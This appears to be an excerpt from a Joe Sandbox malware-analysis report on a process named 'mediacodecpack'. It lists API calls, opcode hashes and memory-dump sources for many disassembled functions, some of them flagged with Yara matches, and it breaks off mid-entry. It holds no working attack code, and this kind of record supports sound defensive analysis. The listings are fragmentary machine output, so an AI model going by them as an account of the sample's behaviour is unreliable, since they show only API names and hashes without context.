                                                                                            • Opcode ID: cb43346c64efcf00fd68e6c6f4335056ae67aeb95423f7099f14234ef8218e0f
                                                                                            • Instruction ID: 593dabfcfeb5673f1ccffb78ae2c3d722d6a723261f7c43f0e148421ddc7b38f
                                                                                            • Opcode Fuzzy Hash: cb43346c64efcf00fd68e6c6f4335056ae67aeb95423f7099f14234ef8218e0f
                                                                                            • Instruction Fuzzy Hash: 24F05E71E00209ABDB00AFE0D90CBFF7778EB04305F104855E916A2341DB7989188FA1
                                                                                            APIs
                                                                                              • Part of subcall function 6090A0D5: sqlite3_free.SQLITE3 ref: 6090A118
                                                                                            • sqlite3_malloc.SQLITE3 ref: 6094B1D1
                                                                                            • sqlite3_value_bytes.SQLITE3 ref: 6094B24C
                                                                                            • sqlite3_malloc.SQLITE3 ref: 6094B272
                                                                                            • sqlite3_value_blob.SQLITE3 ref: 6094B298
                                                                                            • sqlite3_free.SQLITE3 ref: 6094B2C8
                                                                                              • Part of subcall function 6094A894: sqlite3_bind_int64.SQLITE3 ref: 6094A8C0
                                                                                              • Part of subcall function 6094A894: sqlite3_step.SQLITE3 ref: 6094A8CE
                                                                                              • Part of subcall function 6094A894: sqlite3_column_int64.SQLITE3 ref: 6094A8E9
                                                                                              • Part of subcall function 6094A894: sqlite3_reset.SQLITE3 ref: 6094A90F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_freesqlite3_malloc$sqlite3_bind_int64sqlite3_column_int64sqlite3_resetsqlite3_stepsqlite3_value_blobsqlite3_value_bytes
                                                                                            • String ID:
                                                                                            • API String ID: 683514883-0
                                                                                            • Opcode ID: 3036fcfce1ee653ed62d56f61367963e4d2afc4bfe1ca560103df060be3b8356
                                                                                            • Instruction ID: 83940ce9cf0a2bab7a741171fc95cc3a005d2848f59039768723a80715f2adcb
                                                                                            • Opcode Fuzzy Hash: 3036fcfce1ee653ed62d56f61367963e4d2afc4bfe1ca560103df060be3b8356
                                                                                            • Instruction Fuzzy Hash: E19133B1A052099FCB04CFA9D490B9EBBF6FF68314F108569E855AB341DB34ED81CB91
                                                                                            APIs
                                                                                            • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A200
                                                                                            • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A391
                                                                                            • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A3A3
                                                                                            • sqlite3_free.SQLITE3 ref: 6093A3BA
                                                                                            • sqlite3_free.SQLITE3 ref: 6093A3C2
                                                                                              • Part of subcall function 6093A0C5: sqlite3_mutex_enter.SQLITE3 ref: 6093A114
                                                                                              • Part of subcall function 6093A0C5: sqlite3_mutex_free.SQLITE3 ref: 6093A152
                                                                                              • Part of subcall function 6093A0C5: sqlite3_mutex_leave.SQLITE3 ref: 6093A162
                                                                                              • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1A4
                                                                                              • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1C3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_free$sqlite3_mutex_leave$sqlite3_mutex_free$sqlite3_mutex_enter
                                                                                            • String ID:
                                                                                            • API String ID: 1903298374-0
                                                                                            • Opcode ID: 8530df85f137a660efabd51ca86f4821d2fdcc6d7a3fd2cfb4f5547b241dda56
                                                                                            • Instruction ID: f6c450fbbadf2e04ab128defb7df19fdb2a161b4e6cf4e71623f80625393026f
                                                                                            • Opcode Fuzzy Hash: 8530df85f137a660efabd51ca86f4821d2fdcc6d7a3fd2cfb4f5547b241dda56
                                                                                            • Instruction Fuzzy Hash: EB513870A047218BDB58DF69C8C074AB7A6BF65318F05896CECA69B305D735EC41CF91
                                                                                            APIs
                                                                                              • Part of subcall function 02D50A60: CloseHandle.KERNEL32(00000000,96605425), ref: 02D50AB1
                                                                                              • Part of subcall function 02D50A60: WaitForSingleObject.KERNEL32(?,000000FF,96605425,?,?,?,?,96605425,02D50A33,96605425), ref: 02D50AC8
                                                                                            • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02D50D2E
                                                                                            • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02D50D4E
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 02D50D87
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 02D50DDB
                                                                                            • SetEvent.KERNEL32(?), ref: 02D50DE2
                                                                                              • Part of subcall function 02D4418C: CloseHandle.KERNEL32(00000000,?,02D50D15), ref: 02D441B0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
                                                                                            • String ID:
                                                                                            • API String ID: 4166353394-0
                                                                                            • Opcode ID: e00cff88295c918af4ef5ea226ec298a7c66311a78282426cfe481148b5c580c
                                                                                            • Instruction ID: 7521407a1aabc03c5b2a9e5d77664f0894991604dd78d1a96ad4f93d6b374f4c
                                                                                            • Opcode Fuzzy Hash: e00cff88295c918af4ef5ea226ec298a7c66311a78282426cfe481148b5c580c
                                                                                            • Instruction Fuzzy Hash: DA41D2316003218FDF259F18CC80B1BB7A4EF49725F18066AEC19AB395D77AEC01CBA1
                                                                                            APIs
                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02D420AC
                                                                                            • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02D420CD
                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D420D8
                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 02D4213E
                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D421A6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Interlocked$Exchange$DecrementTimerWaitable
                                                                                            • String ID:
                                                                                            • API String ID: 1611172436-0
                                                                                            • Opcode ID: dc401a7cdd6e3633caac98743c91fe107d4aaccb0a914411c4f721cff350e85a
                                                                                            • Instruction ID: 296ec6bae9fb9769d84b26ffc5b4aeb7364152c2b20a8f9d8852608b1557b893
                                                                                            • Opcode Fuzzy Hash: dc401a7cdd6e3633caac98743c91fe107d4aaccb0a914411c4f721cff350e85a
                                                                                            • Instruction Fuzzy Hash: 16311771504701AFC324DF25D889A6BBBE9FBD8754F104A1EF89682750DB30E946CBA2
                                                                                            APIs
                                                                                              • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 6093A114
                                                                                            • sqlite3_mutex_free.SQLITE3 ref: 6093A152
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 6093A162
                                                                                            • sqlite3_free.SQLITE3 ref: 6093A1A4
                                                                                            • sqlite3_free.SQLITE3 ref: 6093A1C3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_mutex_freesqlite3_mutex_leavesqlite3_mutex_try
                                                                                            • String ID:
                                                                                            • API String ID: 1894464702-0
                                                                                            • Opcode ID: 7188b9a67afd66d207271078c150a83da37f36a2752b1b5804700c826a798ba9
                                                                                            • Instruction ID: 8ebadd1dc7ee404a0f141fd21885e91e0aa1156a5a6df10951b92a0b718128ce
                                                                                            • Opcode Fuzzy Hash: 7188b9a67afd66d207271078c150a83da37f36a2752b1b5804700c826a798ba9
                                                                                            • Instruction Fuzzy Hash: CF313C70B086118BDB18DF79C8C1A1A7BFBBFB2704F148468E8418B219EB35DC419F91
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D4D101
                                                                                              • Part of subcall function 02D41A01: TlsGetValue.KERNEL32 ref: 02D41A0A
                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D4D180
                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02D4D19C
                                                                                            • InterlockedIncrement.KERNEL32(02D730F0), ref: 02D4D1C1
                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02D4D1D6
                                                                                              • Part of subcall function 02D427F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 02D4284E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
                                                                                            • String ID:
                                                                                            • API String ID: 1578506061-0
                                                                                            • Opcode ID: 280cf5975b3f169052a634fd15cb257402868b571c033bc352546af235959997
                                                                                            • Instruction ID: 2e239f2cfd976ff4d2f2681e2e9bc75175a3e2c02b669865b34b7d5d13af7a59
                                                                                            • Opcode Fuzzy Hash: 280cf5975b3f169052a634fd15cb257402868b571c033bc352546af235959997
                                                                                            • Instruction Fuzzy Hash: C13136B1D012059FC710DFA8D548AAABBF9FF09310F14455ED889E7740EB35AA14CFA0
                                                                                            APIs
                                                                                              • Part of subcall function 60925326: sqlite3_log.SQLITE3 ref: 60925352
                                                                                            • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,609254CC), ref: 6092538E
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 609253C4
                                                                                            • sqlite3_log.SQLITE3 ref: 609253E2
                                                                                            • sqlite3_log.SQLITE3 ref: 60925406
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 60925443
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_log$sqlite3_mutex_leave$sqlite3_mutex_enter
                                                                                            • String ID:
                                                                                            • API String ID: 3336957480-0
                                                                                            • Opcode ID: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
                                                                                            • Instruction ID: a100dd02d465b32589d57b5b9efe4db3cd483c3b5de54de748c9b161d5d001e2
                                                                                            • Opcode Fuzzy Hash: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
                                                                                            • Instruction Fuzzy Hash: D3315A70228704DBDB00EF28D49575ABBE6AFA1358F00886DE9948F36DD778C885DB02
                                                                                            APIs
                                                                                            • sqlite3_result_blob.SQLITE3 ref: 609613D0
                                                                                            • sqlite3_column_int.SQLITE3 ref: 6096143A
                                                                                            • sqlite3_data_count.SQLITE3 ref: 60961465
                                                                                            • sqlite3_column_value.SQLITE3 ref: 60961476
                                                                                            • sqlite3_result_value.SQLITE3 ref: 60961482
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_column_intsqlite3_column_valuesqlite3_data_countsqlite3_result_blobsqlite3_result_value
                                                                                            • String ID:
                                                                                            • API String ID: 3091402450-0
                                                                                            • Opcode ID: 15f5c91e7d752206cb5be57281081ebbda5684d1dfb7c3b21a78c03d1c189b87
                                                                                            • Instruction ID: 8b12398a3b1f37ca0d2e1a8d549e1f0529ecbd38da511dd0edd3444da8e5cc4d
                                                                                            • Opcode Fuzzy Hash: 15f5c91e7d752206cb5be57281081ebbda5684d1dfb7c3b21a78c03d1c189b87
                                                                                            • Instruction Fuzzy Hash: 72314DB19082058FDB00DF29C48064EB7F6FF65354F19856AE8999B361EB34E886CF81
                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(00000000), ref: 02D42A3B
                                                                                            • closesocket.WS2_32 ref: 02D42A42
                                                                                            • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02D42A89
                                                                                            • WSASetLastError.WS2_32(00000000,?,8004667E,00000000), ref: 02D42A97
                                                                                            • closesocket.WS2_32 ref: 02D42A9E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLastclosesocket$ioctlsocket
                                                                                            • String ID:
                                                                                            • API String ID: 1561005644-0
                                                                                            • Opcode ID: f10883465d16fad5c89638b254970198b66151fd6dec82d8c570348c02f51195
                                                                                            • Instruction ID: 233ad93fa4034004491afb91a4af7ec9074c505c122d2cef1acb5de95f816cc2
                                                                                            • Opcode Fuzzy Hash: f10883465d16fad5c89638b254970198b66151fd6dec82d8c570348c02f51195
                                                                                            • Instruction Fuzzy Hash: 7E21C175E04205AFEB20ABB8985C76AB7E9DF44315F51496AED55C3390EF708D80CB60
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                                                            • String ID:
                                                                                            • API String ID: 251237202-0
                                                                                            • Opcode ID: ee0aefbaff40cad113deb2524f723b57adfc4224f15c8691f87345bc20e459c1
                                                                                            • Instruction ID: 8e14962182cb4ba31828fc05f1b37fa5954e33605a362b2e641de35f96add61e
                                                                                            • Opcode Fuzzy Hash: ee0aefbaff40cad113deb2524f723b57adfc4224f15c8691f87345bc20e459c1
                                                                                            • Instruction Fuzzy Hash: 022137B46087158BC709AF68C48570ABBF6FFA5318F10895DEC958B345DB74E940CB82
                                                                                            APIs
                                                                                            • sqlite3_aggregate_context.SQLITE3 ref: 6091A31E
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6091A349
                                                                                            • sqlite3_value_bytes.SQLITE3 ref: 6091A356
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6091A37B
                                                                                            • sqlite3_value_bytes.SQLITE3 ref: 6091A387
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_aggregate_context
                                                                                            • String ID:
                                                                                            • API String ID: 4225432645-0
                                                                                            • Opcode ID: e7dd5294350f58c57afd4f2551108a775ab72f2657aaaf635efeb712e258985e
                                                                                            • Instruction ID: 24a20a1669ecabf1c8c9e0f75de4e20f6480f0c3e20d7f4799920e66bb4c3c2a
                                                                                            • Opcode Fuzzy Hash: e7dd5294350f58c57afd4f2551108a775ab72f2657aaaf635efeb712e258985e
                                                                                            • Instruction Fuzzy Hash: 3F21CF71B086588FDB009F29C48075E7BE7AFA4254F0484A8E894CF305EB34DC86CB91
                                                                                            APIs
                                                                                            • _malloc.LIBCMT ref: 02D5E8B0
                                                                                              • Part of subcall function 02D51FBC: __FF_MSGBANNER.LIBCMT ref: 02D51FD3
                                                                                              • Part of subcall function 02D51FBC: __NMSG_WRITE.LIBCMT ref: 02D51FDA
                                                                                              • Part of subcall function 02D51FBC: RtlAllocateHeap.NTDLL(00800000,00000000,00000001), ref: 02D51FFF
                                                                                            • _free.LIBCMT ref: 02D5E8C3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap_free_malloc
                                                                                            • String ID:
                                                                                            • API String ID: 1020059152-0
                                                                                            • Opcode ID: be0adbd6a73625f4abf1b151c192f53b9e0c29309d63eb1a0ab689c454bc92dc
                                                                                            • Instruction ID: b91a02664504be3afa1db802ca4192e20abc91161ac67f94fd3b8f6401e74be2
                                                                                            • Opcode Fuzzy Hash: be0adbd6a73625f4abf1b151c192f53b9e0c29309d63eb1a0ab689c454bc92dc
                                                                                            • Instruction Fuzzy Hash: 69119432844631AACFA53F70A80875A3B9ADF04365F504A35FD4996390DBB5CE90CEA5
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D421DA
                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D421ED
                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 02D42224
                                                                                            • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 02D42237
                                                                                            • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02D42261
                                                                                              • Part of subcall function 02D42341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D42350
                                                                                              • Part of subcall function 02D42341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D42360
                                                                                              • Part of subcall function 02D42341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D42370
                                                                                              • Part of subcall function 02D42341: GetLastError.KERNEL32 ref: 02D4237A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                            • String ID:
                                                                                            • API String ID: 1856819132-0
                                                                                            • Opcode ID: ce5944701e372a8c20d0d16fd90cedd638cbeb07ca6cdf514eab66bc09ffd07c
                                                                                            • Instruction ID: 1594ef70fa66410880f38bcaac977547a3f7a6b2263c02ff7ed53c007ea2cda1
                                                                                            • Opcode Fuzzy Hash: ce5944701e372a8c20d0d16fd90cedd638cbeb07ca6cdf514eab66bc09ffd07c
                                                                                            • Instruction Fuzzy Hash: 7C118171D00115EBDB119FA4E84C6AEBBBAFF45310F10851AFC55A2360DB758E61CBA1
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D4229D
                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D422B0
                                                                                            • TlsGetValue.KERNEL32 ref: 02D422E7
                                                                                            • TlsSetValue.KERNEL32(?), ref: 02D42300
                                                                                            • TlsSetValue.KERNEL32(?,?,?), ref: 02D4231C
                                                                                              • Part of subcall function 02D42341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D42350
                                                                                              • Part of subcall function 02D42341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D42360
                                                                                              • Part of subcall function 02D42341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D42370
                                                                                              • Part of subcall function 02D42341: GetLastError.KERNEL32 ref: 02D4237A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                            • String ID:
                                                                                            • API String ID: 1856819132-0
                                                                                            • Opcode ID: 7d921126e2a9d75025f25b15f448ebcb239e68a08caad48b0f148768edb2a9cf
                                                                                            • Instruction ID: a6e9b7f5040c27428f22f11c0751876175a200d701f345253e9058862b1618ea
                                                                                            • Opcode Fuzzy Hash: 7d921126e2a9d75025f25b15f448ebcb239e68a08caad48b0f148768edb2a9cf
                                                                                            • Instruction Fuzzy Hash: 12115B71D00119EBDB119FA5E8086AEBBBAFF54310F10852AEC04A3320DB758E61CBA1
                                                                                            APIs
                                                                                              • Part of subcall function 02D4A169: __EH_prolog.LIBCMT ref: 02D4A16E
                                                                                            • __CxxThrowException@8.LIBCMT ref: 02D4AD33
                                                                                              • Part of subcall function 02D531CA: RaiseException.KERNEL32(?,?,02D4EB63,?,?,?,?,?,?,?,02D4EB63,?,02D6ECA8,?), ref: 02D5321F
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,02D6FA1C,?,00000001), ref: 02D4AD49
                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02D4AD5C
                                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,02D6FA1C,?,00000001), ref: 02D4AD6C
                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D4AD7A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
                                                                                            • String ID:
                                                                                            • API String ID: 2725315915-0
                                                                                            • Opcode ID: 39bbc9d416095abb08076f0192613dce5a12549bec926554497685109dae8723
                                                                                            • Instruction ID: e462da127130050dd86e15572bf2136207adf75b7647e279094d38f6381b990c
                                                                                            • Opcode Fuzzy Hash: 39bbc9d416095abb08076f0192613dce5a12549bec926554497685109dae8723
                                                                                            • Instruction Fuzzy Hash: 7301D1B6A80204AFDB009FA4EC8DF8A77ACEB04355B504414F611D6390EBA0EC44CB60
                                                                                            APIs
                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D42432
                                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02D42445
                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02D42454
                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02D42469
                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02D42470
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
                                                                                            • String ID:
                                                                                            • API String ID: 747265849-0
                                                                                            • Opcode ID: aee66d3fffd8d4490c13bef9ab54e426df536a32260f4fbb9f345b8a326bd45c
                                                                                            • Instruction ID: 8fc7594c48b5615bf81762a3f05fdee0109d3f22e6210032bc063c9d374fa2fe
